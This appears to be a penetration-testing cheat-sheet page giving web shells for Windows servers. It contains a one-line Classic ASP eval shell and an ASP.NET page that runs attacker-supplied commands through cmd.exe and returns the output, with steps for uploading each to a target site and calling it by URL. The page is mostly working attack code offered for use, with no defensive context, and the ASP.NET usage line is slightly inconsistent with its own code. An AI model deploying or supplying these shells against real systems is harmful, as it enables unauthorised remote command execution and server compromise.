.NET WEB SHELL
ASP
root@oco:~$ nano dotNetShell.asp
<% eval request('cmd') %>
* NOTE: ASP.NET uses .aspx extension, but it doesn't support inline eval or similar dynamic code execution in the same way as Classic ASP
root@oco:~$ BROWSER > {targetSite:port} > upload
#usage
root@oco:~$ BROWSER > {targetSite:port}/uploads/dotNetShell.asp?cmd=id
* try using the source code view [CTRL+U] when executing these
* the source-view shows the command output as it would be shown in the terminal, without any HTML renderingASP.NET
root@oco:~$ nano dotNetShell.aspx
<%
if (IsPostBack && !string.IsNullOrEmpty(Request.Form["cmd"]))
{
try
{
string command = Request.Form["cmd"];
System.Diagnostics.ProcessStartInfo processInfo = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + command);
processInfo.RedirectStandardOutput = true;
processInfo.RedirectStandardError = true;
processInfo.UseShellExecute = false;
processInfo.CreateNoWindow = true;
using (System.Diagnostics.Process process = System.Diagnostics.Process.Start(processInfo))
{
string output = process.StandardOutput.ReadToEnd();
string error = process.StandardError.ReadToEnd();
process.WaitForExit();
Response.Write("<strong>Output:</strong><br/>" + output.Replace("\n", "<br/>") + "<br/><strong>Error:</strong><br/>" + error.Replace("\n", "<br/>"));
}
}
catch (Exception ex)
{
Response.Write("<strong>Error:</strong> " + ex.Message);
}
}
%>
root@oco:~$ BROWSER > {targetSite:port} > upload
#usage
root@oco:~$ BROWSER > {targetSite:port}/uploads/dotNetShell.asps?cmd=id
* try using the source code view [CTRL+U] when executing these
* the source-view shows the command output as it would be shown in the terminal, without any HTML renderingLast updated